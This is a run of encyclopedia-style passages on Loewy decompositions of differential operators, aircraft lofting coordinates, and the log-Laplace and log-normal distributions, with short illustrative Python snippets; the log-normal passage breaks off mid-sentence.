L x m ( L ) {\displaystyle \mathbb {L} _{x^{m}}(L)} and L y n ( L ) {\displaystyle \mathbb {L} _{y^{n}}(L)} as well as l m {\displaystyle {\mathfrak {l}}_{m}} and k n {\displaystyle {\mathfrak {k}}_{n}} are defined above; furthermore l ≡ ∂ x + a {\displaystyle l\equiv \partial _{x}+a} , k ≡ ∂ y + b {\displaystyle k\equiv \partial _{y}+b} , a , b ∈ Q ( x , y ) {\displaystyle a,b\in \mathbb {Q} (x,y)} . L {\displaystyle L} has Loewy decompositions involving Laplace divisors according to one of the following types; m {\displaystyle m} and n {\displaystyle n} obey m , n ≥ 2 {\displaystyle m,n\geq 2} .
L x y 4 : L = Lclm ( L x m ( L ) , L y n ( L ) ) ; {\displaystyle {\mathcal {L}}_{xy}^{4}:L=\operatorname {Lclm} \left(\mathbb {L} _{x^{m}}(L),\mathbb {L} _{y^{n}}(L)\right);} L x y 5 : L = E x q u o ( L , L x m ( L ) ) L x m ( L ) = ( 1 0 0 ∂ y + A 1 ) ( L l m ) ; {\displaystyle {\mathcal {L}}_{xy}^{5}:L=Exquo{\big (}L,\mathbb {L} _{x^{m}}(L){\big )}\mathbb {L} _{x^{m}}(L)={\begin{pmatrix}1&0\\0&\partial _{y}+A_{1}\end{pmatrix}}{\begin{pmatrix}L\\{\mathfrak {l}}_{m}\end{pmatrix}};} L x y 6 : L = E x q u o ( L , L y n ( L ) ) L y n ( L ) = ( 1 0 0 ∂ x + A 2 ) ( L k n ) ; {\displaystyle {\mathcal {L}}_{xy}^{6}:L=Exquo{\big (}L,\mathbb {L} _{y^{n}}(L){\big )}\mathbb {L} _{y^{n}}(L)={\begin{pmatrix}1&0\\0&\partial _{x}+A_{2}\end{pmatrix}}{\begin{pmatrix}L\\{\mathfrak {k}}_{n}\end{pmatrix}};} L x y 7 : L = Lclm ( k , L x m ( L ) ) ; {\displaystyle {\mathcal {L}}_{xy}^{7}:L=\operatorname {Lclm} {\big (}k,\mathbb {L} _{x^{m}}(L){\big )};} L x y 8 : L = Lclm ( l , L y n ( L ) ) . {\displaystyle {\mathcal {L}}_{xy}^{8}:L=\operatorname {Lclm} {\big (}l,\mathbb {L} _{y^{n}}(L){\big )}.}
If L {\displaystyle L} has no first-order right factor and it can be shown that a Laplace divisor does not exist, its decomposition type is defined to be L x y 0 {\displaystyle {\mathcal {L}}_{xy}^{0}} . The decompositions L x y 0 {\displaystyle {\mathcal {L}}_{xy}^{0}} , L x y 4 {\displaystyle {\mathcal {L}}_{xy}^{4}} , L x y 7 {\displaystyle {\mathcal {L}}_{xy}^{7}} and L x y 8 {\displaystyle {\mathcal {L}}_{xy}^{8}} are completely reducible.
An equation that does not allow a decomposition involving principal divisors but is completely reducible with respect to non-principal Laplace divisors of type L x y 4 {\displaystyle {\mathcal {L}}_{xy}^{4}} has been considered by Forsyth.
Example 6 (Forsyth 1906) Define L ≡ ∂ x y + 2 x − y ∂ x − 2 x − y ∂ y − 4 ( x − y ) 2 {\displaystyle L\equiv \partial _{xy}+{\frac {2}{x-y}}\partial _{x}-{\frac {2}{x-y}}\partial _{y}-{\frac {4}{(x-y)^{2}}}} generating the principal ideal ⟨ L ⟩ {\displaystyle \langle L\rangle } . A first-order factor does not exist. However, there are Laplace divisors L x 2 ( L ) ≡ ⟨ ⟨ ∂ x x − 2 x − y ∂ x + 2 ( x − y ) 2 , L ⟩ ⟩ {\displaystyle \mathbb {L} _{x^{2}}(L)\equiv {{\Big \langle }{\Big \langle }}\partial _{xx}-{\frac {2}{x-y}}\partial _{x}+{\frac {2}{(x-y)^{2}}},L{{\Big \rangle }{\Big \rangle }}} and L y 2 ( L ) ≡ ⟨ ⟨ L , ∂ y y + 2 x − y ∂ y + 2 ( x − y ) 2 ⟩ ⟩ . {\displaystyle \mathbb {L} _{y^{2}}(L)\equiv {{\Big \langle }{\Big \langle }}L,\partial _{yy}+{\frac {2}{x-y}}\partial _{y}+{\frac {2}{(x-y)^{2}}}{{\Big \rangle }{\Big \rangle }}.}
The ideal generated by L {\displaystyle L} has the representation ⟨ L ⟩ = Lclm ( L x 2 ( L ) , L y 2 ( L ) ) {\displaystyle \langle L\rangle =\operatorname {Lclm} {\big (}\mathbb {L} _{x^{2}}(L),\mathbb {L} _{y^{2}}(L){\big )}} , i.e. it is completely reducible; its decomposition type is L x y 4 {\displaystyle {\mathcal {L}}_{xy}^{4}} . Therefore, the equation L z = 0 {\displaystyle Lz=0} has the differential fundamental system z 1 ( x , y ) = 2 ( x − y ) F ( y ) + ( x − y ) 2 F ′ ( y ) {\displaystyle z_{1}(x,y)=2(x-y)F(y)+(x-y)^{2}F'(y)} and z 2 ( x , y ) = 2 ( y − x ) G ( x ) + ( y − x ) 2 G ′ ( x ) . {\displaystyle z_{2}(x,y)=2(y-x)G(x)+(y-x)^{2}G'(x).}
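Both elements of this fundamental system may be checked symbolically with arbitrary functions F and G; a SymPy sketch (not part of the source):

```python
import sympy as sp

x, y = sp.symbols('x y')
F, G = sp.Function('F'), sp.Function('G')

def L(z):  # the operator of Example 6 applied to z
    return (sp.diff(z, x, y) + 2/(x - y)*sp.diff(z, x)
            - 2/(x - y)*sp.diff(z, y) - 4/(x - y)**2*z)

z1 = 2*(x - y)*F(y) + (x - y)**2*sp.diff(F(y), y)
z2 = 2*(y - x)*G(x) + (y - x)**2*sp.diff(G(x), x)
print(sp.simplify(L(z1)), sp.simplify(L(z2)))  # 0 0
```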
It turns out that operators of higher order have more complicated decompositions and there are more alternatives, many of them in terms of non-principal divisors. The solutions of the corresponding equations become more complex. For equations of order three in the plane a fairly complete answer may be found in [ 2 ] . A typical example of a third-order equation that is also of historical interest is due to Blumberg. [ 14 ]
Example 7 (Blumberg 1912)
In his dissertation, Blumberg considered the third-order operator
L ≡ ∂ x x x + x ∂ x x y + 2 ∂ x x + 2 ( x + 1 ) ∂ x y + ∂ x + ( x + 2 ) ∂ y . {\displaystyle L\equiv \partial _{xxx}+x\partial _{xxy}+2\partial _{xx}+2(x+1)\partial _{xy}+\partial _{x}+(x+2)\partial _{y}.}
It allows the two first-order factors l 1 ≡ ∂ x + 1 {\displaystyle l_{1}\equiv \partial _{x}+1} and l 2 ≡ ∂ x + x ∂ y {\displaystyle l_{2}\equiv \partial _{x}+x\partial _{y}} . Their intersection is not principal; defining
L 1 ≡ ∂ x x x − x 2 ∂ x y y + 3 ∂ x x + ( 2 x + 3 ) ∂ x y − x 2 ∂ y y + 2 ∂ x + ( 2 x + 3 ) ∂ y {\displaystyle L_{1}\equiv \partial _{xxx}-x^{2}\partial _{xyy}+3\partial _{xx}+(2x+3)\partial _{xy}-x^{2}\partial _{yy}+2\partial _{x}+(2x+3)\partial _{y}} L 2 ≡ ∂ x x y + x ∂ x y y − 1 x ∂ x x − 1 x ∂ x y + x ∂ y y − 1 x ∂ x − ( 1 + 1 x ) ∂ y {\displaystyle L_{2}\equiv \partial _{xxy}+x\partial _{xyy}-{\frac {1}{x}}\partial _{xx}-{\frac {1}{x}}\partial _{xy}+x\partial _{yy}-{\frac {1}{x}}\partial _{x}-\left(1+{\frac {1}{x}}\right)\partial _{y}}
it may be written as Lclm ( l 2 , l 1 ) = ⟨ ⟨ L 1 , L 2 ⟩ ⟩ {\displaystyle \operatorname {Lclm} (l_{2},l_{1})={\langle \langle }L_{1},L_{2}{\rangle \rangle }} . Consequently, the Loewy decomposition of Blumberg's operator is L = ( 1 x 0 ∂ x + 1 + 1 x ) ( L 1 L 2 ) . {\displaystyle L={\begin{pmatrix}1&x\\0&\partial _{x}+1+{\frac {1}{x}}\end{pmatrix}}{\begin{pmatrix}L_{1}\\L_{2}\end{pmatrix}}.}
It yields the following differential fundamental system for the differential equation L z = 0 {\displaystyle Lz=0} .
F , G {\displaystyle F,G} and H {\displaystyle H} are undetermined functions.
Factorizations and Loewy decompositions have turned out to be an extremely useful method for determining solutions of linear differential equations in closed form, both for ordinary and partial equations. It should be possible to generalize these methods to equations of higher order, equations in more variables, and systems of differential equations.
Lofting coordinates are used for aircraft body measurements. The system derives from the one used in the shipbuilding lofting process, with the longitudinal axis labeled in "stations" (usually fuselage stations , frame stations , FS ), the transverse axis in "buttocks lines" (or butt lines , BL ), and the vertical axis in " waterlines " (WL). The lofting coordinate frame is similar to, but not the same as, the aircraft principal axes used to describe the aircraft's flight. For US-manufactured aircraft the ticks on the axes are labeled in inches [ 1 ] (for example, WL 100 is 100 inches above the base waterline).
Fuselage stations are traditionally nonnegative, thus the origin is located at the nose of the plane or, sometimes, ahead of it. When compared to the coordinates used for aeromechanics , the fuselage stations are measured in the opposite direction from the ticks on the x-axis (and might not be aligned at all, if the wind-aligned coordinate system is used to describe the flight). [ 1 ] Some manufacturers use the designation "body stations", with the corresponding abbreviation BS. [ 2 ]
Per the US Air Force Airframe Maintenance and Repair Manual (1960), a horizontal waterline extends from the nose cone of the aircraft to the exhaust cone . The base line of the aircraft is designated as waterline 0 (zero). The location of this base line varies on different types of aircraft; however, the planes of all waterlines above and below the zero waterline are parallel. [ 3 ] The waterline number (WL or W.L.) in the US is expressed in inches , with values increasing upwards. Two typical alignments for the base line are the tip of the nose (negative WL are possible) or the "nominal ground plane" (measurements will be nonnegative). [ 4 ]
Butt line ticks increase to the right of the pilot with the origin at the centerline . When compared to the ( right-handed ) aeromechanics coordinate systems, the direction of the butt line is opposite to the y-axis. [ 1 ]
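A hedged sketch in Python of the conversion implied by the text: x runs opposite the fuselage stations and y opposite the butt lines, with waterlines measured up from a reference. The class and function names, the reference offsets fs0 and wl0, and the choice of z pointing upward are all illustrative assumptions, not part of the source; actual conventions are airframe-specific.

```python
from dataclasses import dataclass

@dataclass
class LoftingPoint:
    fs: float  # fuselage station (inches), increases aft
    bl: float  # butt line (inches), increases to the pilot's right
    wl: float  # waterline (inches), increases upward

def to_body_frame(p, fs0=0.0, wl0=0.0):
    """Map lofting coordinates to a body frame as described above (sketch)."""
    x = -(p.fs - fs0)   # x-axis runs opposite the station numbering
    y = -p.bl           # butt lines run opposite the y-axis (per the text)
    z = p.wl - wl0      # height above the chosen reference waterline (assumed z-up)
    return x, y, z

print(to_body_frame(LoftingPoint(fs=250.0, bl=-30.0, wl=100.0), fs0=100.0))
```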
Many other reference points are used, especially on a large aircraft: [ 2 ] | https://en.wikipedia.org/wiki/Lofting_coordinates |
In probability theory and statistics , the log-Laplace distribution is the probability distribution of a random variable whose logarithm has a Laplace distribution . If X has a Laplace distribution with parameters μ and b , then Y = e X has a log-Laplace distribution. The distributional properties can be derived from the Laplace distribution.
A random variable has a log-Laplace( μ , b ) distribution if its probability density function is, for y > 0 : [ 1 ] f ( y ) = 1 2 b y exp ( − | ln y − μ | b ) {\displaystyle f(y)={\frac {1}{2by}}\exp \left(-{\frac {|\ln y-\mu |}{b}}\right)} This is the Laplace density evaluated at ln y , multiplied by the Jacobian factor 1 / y .
The cumulative distribution function for Y when y > 0 is the Laplace cumulative distribution function evaluated at ln y : F ( y ) = 1 2 [ 1 + sgn ( ln y − μ ) ( 1 − e − | ln y − μ | / b ) ] {\displaystyle F(y)={\frac {1}{2}}\left[1+\operatorname {sgn}(\ln y-\mu )\left(1-e^{-|\ln y-\mu |/b}\right)\right]}
Versions of the log-Laplace distribution based on an asymmetric Laplace distribution also exist. [ 2 ] Depending on the parameters, including asymmetry, the log-Laplace may or may not have a finite mean and a finite variance . [ 2 ]
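The defining transformation makes simulation trivial. A NumPy sketch (parameter values are arbitrary): draw Laplace variates and exponentiate; the sample median of Y estimates e^μ, since the median of the Laplace parent is μ.

```python
import numpy as np

rng = np.random.default_rng(0)
mu, b = 0.5, 0.3
x = rng.laplace(loc=mu, scale=b, size=100_000)  # Laplace(mu, b)
y = np.exp(x)                                   # log-Laplace(mu, b)

print(np.median(y), np.exp(mu))  # close agreement
```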
| https://en.wikipedia.org/wiki/Log-Laplace_distribution |
In probability theory , a log-normal (or lognormal ) distribution is a continuous probability distribution of a random variable whose logarithm is normally distributed . Thus, if the random variable X is log-normally distributed, then Y = ln X has a normal distribution. [ 2 ] [ 3 ] Equivalently, if Y has a normal distribution, then the exponential function of Y , X = exp( Y ) , has a log-normal distribution. A random variable which is log-normally distributed takes only positive real values. It is a convenient and useful model for measurements in exact and engineering sciences, as well as medicine , economics and other topics (e.g., energies, concentrations, lengths, prices of financial instruments, and other metrics).
The distribution is occasionally referred to as the Galton distribution or Galton's distribution , after Francis Galton . [ 4 ] The log-normal distribution has also been associated with other names, such as McAlister , Gibrat and Cobb–Douglas . [ 4 ]
A log-normal process is the statistical realization of the multiplicative product of many independent random variables , each of which is positive. This is justified by considering the central limit theorem in the log domain (sometimes called Gibrat's law ). The log-normal distribution is the maximum entropy probability distribution for a random variate X —for which the mean and variance of ln X are specified. [ 5 ]
Let Z {\displaystyle Z} be a standard normal variable , and let μ {\displaystyle \mu } and σ {\displaystyle \sigma } be two real numbers, with σ > 0 {\displaystyle \sigma >0} . Then, the distribution of the random variable
X = e μ + σ Z {\displaystyle X=e^{\mu +\sigma Z}}
is called the log-normal distribution with parameters μ {\displaystyle \mu } and σ {\displaystyle \sigma } . These are the expected value (or mean ) and standard deviation of the variable's natural logarithm , ln X {\displaystyle \ln X} , not the expectation and standard deviation of X {\displaystyle X} itself.
This relationship is true regardless of the base of the logarithmic or exponential function: If log a X {\displaystyle \log _{a}X} is normally distributed, then so is log b X {\displaystyle \log _{b}X} for any two positive numbers a , b ≠ 1 {\displaystyle a,b\neq 1} . Likewise, if e Y {\displaystyle e^{Y}} is log-normally distributed, then so is a Y {\displaystyle a^{Y}} , where 0 < a ≠ 1 {\displaystyle 0<a\neq 1} .
In order to produce a distribution with desired mean μ X {\displaystyle \mu _{X}} and variance σ X 2 {\displaystyle \sigma _{X}^{2}} , one uses μ = ln μ X 2 μ X 2 + σ X 2 {\displaystyle \mu =\ln {\frac {\mu _{X}^{2}}{\sqrt {\mu _{X}^{2}+\sigma _{X}^{2}}}}} and σ 2 = ln ( 1 + σ X 2 μ X 2 ) {\displaystyle \sigma ^{2}=\ln \left(1+{\frac {\sigma _{X}^{2}}{\mu _{X}^{2}}}\right)} .
Alternatively, the "multiplicative" or "geometric" parameters μ ∗ = e μ {\displaystyle \mu ^{*}=e^{\mu }} and σ ∗ = e σ {\displaystyle \sigma ^{*}=e^{\sigma }} can be used. They have a more direct interpretation: μ ∗ {\displaystyle \mu ^{*}} is the median of the distribution, and σ ∗ {\displaystyle \sigma ^{*}} is useful for determining "scatter" intervals, see below.
A positive random variable X {\displaystyle X} is log-normally distributed (i.e., X ∼ Lognormal ( μ , σ 2 ) {\textstyle X\sim \operatorname {Lognormal} \left(\mu ,\sigma ^{2}\right)} ), if the natural logarithm of X {\displaystyle X} is normally distributed with mean μ {\displaystyle \mu } and variance σ 2 {\displaystyle \sigma ^{2}} :
ln X ∼ N ( μ , σ 2 ) {\displaystyle \ln X\sim {\mathcal {N}}(\mu ,\sigma ^{2})}
Let Φ {\displaystyle \Phi } and φ {\displaystyle \varphi } be respectively the cumulative probability distribution function and the probability density function of the N ( 0 , 1 ) {\displaystyle {\mathcal {N}}(0,1)} standard normal distribution, then we have that [ 2 ] [ 4 ] the probability density function of the log-normal distribution is given by:
f X ( x ) = d d x Pr X [ X ≤ x ] = d d x Pr X [ ln X ≤ ln x ] = d d x Φ ( ln x − μ σ ) = φ ( ln x − μ σ ) d d x ( ln x − μ σ ) = φ ( ln x − μ σ ) 1 σ x = 1 x σ 2 π exp ( − ( ln x − μ ) 2 2 σ 2 ) . {\displaystyle {\begin{aligned}f_{X}(x)&={\frac {d}{dx}}\Pr \nolimits _{X}\left[X\leq x\right]\\[6pt]&={\frac {d}{dx}}\Pr \nolimits _{X}\left[\ln X\leq \ln x\right]\\[6pt]&={\frac {d}{dx}}\Phi {\left({\frac {\ln x-\mu }{\sigma }}\right)}\\[6pt]&=\varphi {\left({\frac {\ln x-\mu }{\sigma }}\right)}{\frac {d}{dx}}\left({\frac {\ln x-\mu }{\sigma }}\right)\\[6pt]&=\varphi {\left({\frac {\ln x-\mu }{\sigma }}\right)}{\frac {1}{\sigma x}}\\[6pt]&={\frac {1}{x\sigma {\sqrt {2\pi }}}}\exp \left(-{\frac {(\ln x-\mu )^{2}}{2\sigma ^{2}}}\right)~.\end{aligned}}}
The cumulative distribution function is
F X ( x ) = Φ ( ln x − μ σ ) {\displaystyle F_{X}(x)=\Phi {\left({\frac {\ln x-\mu }{\sigma }}\right)}}
where Φ {\displaystyle \Phi } is the cumulative distribution function of the standard normal distribution (i.e., N ( 0 , 1 ) {\displaystyle \operatorname {\mathcal {N}} (0,1)} ).
This may also be expressed as follows: [ 2 ]
1 2 [ 1 + erf ( ln x − μ σ 2 ) ] = 1 2 erfc ( − ln x − μ σ 2 ) {\displaystyle {\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {\ln x-\mu }{\sigma {\sqrt {2}}}}\right)\right]={\frac {1}{2}}\operatorname {erfc} \left(-{\frac {\ln x-\mu }{\sigma {\sqrt {2}}}}\right)}
where erfc is the complementary error function .
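In SciPy, the log-normal distribution is exposed as scipy.stats.lognorm with shape parameter s = σ and scale = e^μ. The sketch below (arbitrary parameter values) compares the library's pdf and cdf with the explicit formulas above:

```python
import numpy as np
from scipy.stats import lognorm, norm

mu, sigma, x = 0.0, 0.5, 1.3
dist = lognorm(s=sigma, scale=np.exp(mu))

# Explicit formulas from the text.
pdf = np.exp(-(np.log(x) - mu)**2 / (2*sigma**2)) / (x*sigma*np.sqrt(2*np.pi))
cdf = norm.cdf((np.log(x) - mu) / sigma)

print(dist.pdf(x), pdf)  # equal
print(dist.cdf(x), cdf)  # equal
```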
If X ∼ N ( μ , Σ ) {\displaystyle {\boldsymbol {X}}\sim {\mathcal {N}}({\boldsymbol {\mu }},\,{\boldsymbol {\Sigma }})} is a multivariate normal distribution , then Y i = exp ( X i ) {\displaystyle Y_{i}=\exp(X_{i})} has a multivariate log-normal distribution. [ 6 ] [ 7 ] The exponential is applied element-wise to the random vector X {\displaystyle {\boldsymbol {X}}} . The mean of Y {\displaystyle {\boldsymbol {Y}}} is
E [ Y ] i = e μ i + 1 2 Σ i i , {\displaystyle \operatorname {E} [{\boldsymbol {Y}}]_{i}=e^{\mu _{i}+{\frac {1}{2}}\Sigma _{ii}},}
and its covariance matrix is
Var [ Y ] i j = e μ i + μ j + 1 2 ( Σ i i + Σ j j ) ( e Σ i j − 1 ) . {\displaystyle \operatorname {Var} [{\boldsymbol {Y}}]_{ij}=e^{\mu _{i}+\mu _{j}+{\frac {1}{2}}(\Sigma _{ii}+\Sigma _{jj})}\left(e^{\Sigma _{ij}}-1\right).}
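A NumPy sketch (with hypothetical values of μ and Σ) evaluating these two formulas:

```python
import numpy as np

mu = np.array([0.1, -0.2])
Sigma = np.array([[0.30, 0.05],
                  [0.05, 0.20]])

d = np.diag(Sigma)
mean_Y = np.exp(mu + 0.5*d)                       # E[Y]_i
cov_Y = (np.exp(np.add.outer(mu, mu) + 0.5*np.add.outer(d, d))
         * (np.exp(Sigma) - 1))                   # Var[Y]_ij
print(mean_Y)
print(cov_Y)
```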
Since the multivariate log-normal distribution is not widely used, the rest of this entry only deals with the univariate distribution .
All moments of the log-normal distribution exist and
E [ X n ] = e n μ + n 2 σ 2 / 2 {\displaystyle \operatorname {E} [X^{n}]=e^{n\mu +n^{2}\sigma ^{2}/2}}
This can be derived by letting z = ln x − μ σ − n σ {\textstyle z={\tfrac {\ln x-\mu }{\sigma }}-n\sigma } within the integral. However, the log-normal distribution is not determined by its moments. [ 8 ] This implies that it cannot have a defined moment generating function in a neighborhood of zero. [ 9 ] Indeed, the expected value E [ e t X ] {\displaystyle \operatorname {E} [e^{tX}]} is not defined for any positive value of the argument t {\displaystyle t} , since the defining integral diverges.
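The moment formula itself is easy to check by simulation; a Monte Carlo sketch with arbitrary parameter values:

```python
import numpy as np

rng = np.random.default_rng(1)
mu, sigma, n = 0.2, 0.4, 3
x = np.exp(rng.normal(mu, sigma, size=1_000_000))

# Sample moment vs. exp(n*mu + n^2*sigma^2/2); close agreement expected.
print(np.mean(x**n), np.exp(n*mu + n**2*sigma**2/2))
```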
The characteristic function E [ e i t X ] {\displaystyle \operatorname {E} [e^{itX}]} is defined for real values of t , but is not defined for any complex value of t that has a negative imaginary part, and hence the characteristic function is not analytic at the origin. Consequently, the characteristic function of the log-normal distribution cannot be represented as an infinite convergent series. [ 10 ] In particular, its formal Taylor series diverges:
∑ n = 0 ∞ ( i t ) n n ! e n μ + n 2 σ 2 / 2 {\displaystyle \sum _{n=0}^{\infty }{\frac {{\left(it\right)}^{n}}{n!}}e^{n\mu +n^{2}\sigma ^{2}/2}}
However, a number of alternative divergent series representations have been obtained. [ 10 ] [ 11 ] [ 12 ] [ 13 ]
A closed-form formula for the characteristic function φ ( t ) {\displaystyle \varphi (t)} with t {\displaystyle t} in the domain of convergence is not known. A relatively simple approximating formula is available in closed form, and is given by [ 14 ]
φ ( t ) ≈ exp ( − W 2 ( − i t σ 2 e μ ) + 2 W ( − i t σ 2 e μ ) 2 σ 2 ) 1 + W ( − i t σ 2 e μ ) {\displaystyle \varphi (t)\approx {\frac {\exp \left(-{\frac {W^{2}(-it\sigma ^{2}e^{\mu })+2W(-it\sigma ^{2}e^{\mu })}{2\sigma ^{2}}}\right)}{\sqrt {1+W{\left(-it\sigma ^{2}e^{\mu }\right)}}}}}
where W {\displaystyle W} is the Lambert W function . This approximation is derived via an asymptotic method, but it remains accurate throughout the domain of convergence of φ {\displaystyle \varphi } .
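A sketch evaluating this approximation with scipy.special.lambertw and comparing it against direct numerical integration of E[e^{itX}]; parameter values are arbitrary, and agreement is approximate since the closed form is itself an approximation:

```python
import numpy as np
from scipy.special import lambertw
from scipy.integrate import quad

mu, sigma, t = 0.0, 0.5, 1.0

w = lambertw(-1j*t*sigma**2*np.exp(mu))
phi_approx = np.exp(-(w**2 + 2*w)/(2*sigma**2)) / np.sqrt(1 + w)

def f(x):  # log-normal pdf
    return np.exp(-(np.log(x) - mu)**2/(2*sigma**2))/(x*sigma*np.sqrt(2*np.pi))

# Real and imaginary parts of E[exp(itX)]; minor quadrature error expected.
re = quad(lambda x: np.cos(t*x)*f(x), 0, np.inf)[0]
im = quad(lambda x: np.sin(t*x)*f(x), 0, np.inf)[0]
print(phi_approx, re + 1j*im)
```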
The probability content of a log-normal distribution in any arbitrary domain can be computed to desired precision by first transforming the variable to normal, then numerically integrating using the ray-trace method. [ 15 ]
Since the probability of a log-normal can be computed in any domain, this means that the cdf (and consequently pdf and inverse cdf) of any function of a log-normal variable can also be computed. [ 15 ]
The geometric or multiplicative mean of the log-normal distribution is GM [ X ] = e μ = μ ∗ {\displaystyle \operatorname {GM} [X]=e^{\mu }=\mu ^{*}} . It equals the median. The geometric or multiplicative standard deviation is GSD [ X ] = e σ = σ ∗ {\displaystyle \operatorname {GSD} [X]=e^{\sigma }=\sigma ^{*}} . [ 16 ] [ 17 ]
By analogy with the arithmetic statistics, one can define a geometric variance, GVar [ X ] = e σ 2 {\displaystyle \operatorname {GVar} [X]=e^{\sigma ^{2}}} . A geometric coefficient of variation , [ 16 ] GCV [ X ] = e σ − 1 {\displaystyle \operatorname {GCV} [X]=e^{\sigma }-1} , has also been proposed. This term was intended to be analogous to the coefficient of variation, for describing multiplicative variation in log-normal data, but this definition of GCV has no theoretical basis as an estimate of CV {\displaystyle \operatorname {CV} } itself (see also Coefficient of variation ).
Note that the geometric mean is smaller than the arithmetic mean. This is due to the AM–GM inequality and is a consequence of the logarithm being a concave function . In fact, [ 18 ]
E [ X ] = e μ + 1 2 σ 2 = e μ ⋅ e σ 2 = GM [ X ] ⋅ GVar [ X ] . {\displaystyle \operatorname {E} [X]=e^{\mu +{\frac {1}{2}}\sigma ^{2}}=e^{\mu }\cdot {\sqrt {e^{\sigma ^{2}}}}=\operatorname {GM} [X]\cdot {\sqrt {\operatorname {GVar} [X]}}.}
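A simulation sketch (arbitrary parameters) estimating GM and GSD from samples and checking the identity E[X] = GM[X]·sqrt(GVar[X]):

```python
import numpy as np

rng = np.random.default_rng(2)
mu, sigma = 0.3, 0.6
x = np.exp(rng.normal(mu, sigma, size=1_000_000))

gm = np.exp(np.log(x).mean())       # geometric mean, estimates e^mu
gsd = np.exp(np.log(x).std())       # geometric SD, estimates e^sigma
gvar = np.exp(np.log(gsd)**2)       # geometric variance, e^{sigma^2}

print(gm, np.exp(mu))               # close agreement
print(x.mean(), gm*np.sqrt(gvar))   # E[X] = GM * sqrt(GVar)
```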
In finance, the term e − σ 2 / 2 {\displaystyle e^{-\sigma ^{2}/2}} is sometimes interpreted as a convexity correction . From the point of view of stochastic calculus , this is the same correction term as in Itō's lemma for geometric Brownian motion .
For any real or complex number n , the n -th moment of a log-normally distributed variable X is given by [ 4 ] E [ X n ] = e n μ + 1 2 n 2 σ 2 . {\displaystyle \operatorname {E} [X^{n}]=e^{n\mu +{\frac {1}{2}}n^{2}\sigma ^{2}}.}
Specifically, the arithmetic mean, expected square, arithmetic variance, and arithmetic standard deviation of a log-normally distributed variable X are respectively given by: [ 2 ]
E [ X ] = e μ + 1 2 σ 2 , E [ X 2 ] = e 2 μ + 2 σ 2 , Var [ X ] = E [ X 2 ] − E [ X ] 2 = ( E [ X ] ) 2 ( e σ 2 − 1 ) = e 2 μ + σ 2 ( e σ 2 − 1 ) , SD [ X ] = Var [ X ] = E [ X ] e σ 2 − 1 = e μ + 1 2 σ 2 e σ 2 − 1 , {\displaystyle {\begin{aligned}\operatorname {E} [X]&=e^{\mu +{\tfrac {1}{2}}\sigma ^{2}},\\[4pt]\operatorname {E} [X^{2}]&=e^{2\mu +2\sigma ^{2}},\\[4pt]\operatorname {Var} [X]&=\operatorname {E} [X^{2}]-\operatorname {E} [X]^{2}={\left(\operatorname {E} [X]\right)}^{2}\left(e^{\sigma ^{2}}-1\right)\\[2pt]&=e^{2\mu +\sigma ^{2}}\left(e^{\sigma ^{2}}-1\right),\\[4pt]\operatorname {SD} [X]&={\sqrt {\operatorname {Var} [X]}}=\operatorname {E} [X]{\sqrt {e^{\sigma ^{2}}-1}}\\[2pt]&=e^{\mu +{\tfrac {1}{2}}\sigma ^{2}}{\sqrt {e^{\sigma ^{2}}-1}},\end{aligned}}}
The arithmetic coefficient of variation CV [ X ] {\displaystyle \operatorname {CV} [X]} is the ratio SD [ X ] E [ X ] {\displaystyle {\tfrac {\operatorname {SD} [X]}{\operatorname {E} [X]}}} . For a log-normal distribution it is equal to [ 3 ] CV [ X ] = e σ 2 − 1 . {\displaystyle \operatorname {CV} [X]={\sqrt {e^{\sigma ^{2}}-1}}.} This estimate is sometimes referred to as the "geometric CV" (GCV), [ 19 ] [ 20 ] due to its use of the geometric variance. Contrary to the arithmetic standard deviation, the arithmetic coefficient of variation is independent of the arithmetic mean.
The parameters μ and σ can be obtained, if the arithmetic mean and the arithmetic variance are known:
μ = ln E [ X ] 2 E [ X 2 ] = ln E [ X ] 2 Var [ X ] + E [ X ] 2 , σ 2 = ln E [ X 2 ] E [ X ] 2 = ln ( 1 + Var [ X ] E [ X ] 2 ) . {\displaystyle {\begin{aligned}\mu &=\ln {\frac {\operatorname {E} [X]^{2}}{\sqrt {\operatorname {E} [X^{2}]}}}=\ln {\frac {\operatorname {E} [X]^{2}}{\sqrt {\operatorname {Var} [X]+\operatorname {E} [X]^{2}}}},\\[1ex]\sigma ^{2}&=\ln {\frac {\operatorname {E} [X^{2}]}{\operatorname {E} [X]^{2}}}=\ln \left(1+{\frac {\operatorname {Var} [X]}{\operatorname {E} [X]^{2}}}\right).\end{aligned}}}
A probability distribution is not uniquely determined by the moments E[ X n ] = e nμ + 1 / 2 n 2 σ 2 for n ≥ 1 . That is, there exist other distributions with the same set of moments. [ 4 ] In fact, there is a whole family of distributions with the same moments as the log-normal distribution. [ citation needed ]
The mode is the point of global maximum of the probability density function. In particular, by solving the equation ( ln f ) ′ = 0 {\displaystyle (\ln f)'=0} , we get that:
Mode [ X ] = e μ − σ 2 . {\displaystyle \operatorname {Mode} [X]=e^{\mu -\sigma ^{2}}.}
Since the log-transformed variable Y = ln X {\displaystyle Y=\ln X} has a normal distribution, and quantiles are preserved under monotonic transformations, the quantiles of X {\displaystyle X} are
q X ( α ) = exp [ μ + σ q Φ ( α ) ] = μ ∗ ( σ ∗ ) q Φ ( α ) , {\displaystyle q_{X}(\alpha )=\exp \left[\mu +\sigma q_{\Phi }(\alpha )\right]=\mu ^{*}(\sigma ^{*})^{q_{\Phi }(\alpha )},}
where q Φ ( α ) {\displaystyle q_{\Phi }(\alpha )} is the quantile of the standard normal distribution.
Specifically, the median of a log-normal distribution is equal to its multiplicative mean, [ 21 ]
Med [ X ] = e μ = μ ∗ . {\displaystyle \operatorname {Med} [X]=e^{\mu }=\mu ^{*}~.}
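Since the quantile formula only needs the standard normal quantile function q Φ, it is a one-liner in practice; a sketch using SciPy, with arbitrary parameter values.

```python
import numpy as np
from scipy.stats import norm

def lognormal_quantile(alpha, mu, sigma):
    """q_X(alpha) = exp(mu + sigma * q_Phi(alpha))."""
    return np.exp(mu + sigma * norm.ppf(alpha))

# The median (alpha = 0.5) reduces to exp(mu), as stated above:
print(lognormal_quantile(0.5, mu=1.0, sigma=0.7), np.exp(1.0))
```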
The partial expectation of a random variable X {\displaystyle X} with respect to a threshold k {\displaystyle k} is defined as
g ( k ) = ∫ k ∞ x f X ( x ∣ X > k ) d x . {\displaystyle g(k)=\int _{k}^{\infty }x\,f_{X}(x\mid X>k)\,dx.}
Alternatively, by using the definition of conditional expectation , it can be written as g ( k ) = E [ X ∣ X > k ] Pr ( X > k ) {\displaystyle g(k)=\operatorname {E} [X\mid X>k]\Pr(X>k)} . For a log-normal random variable, the partial expectation is given by:
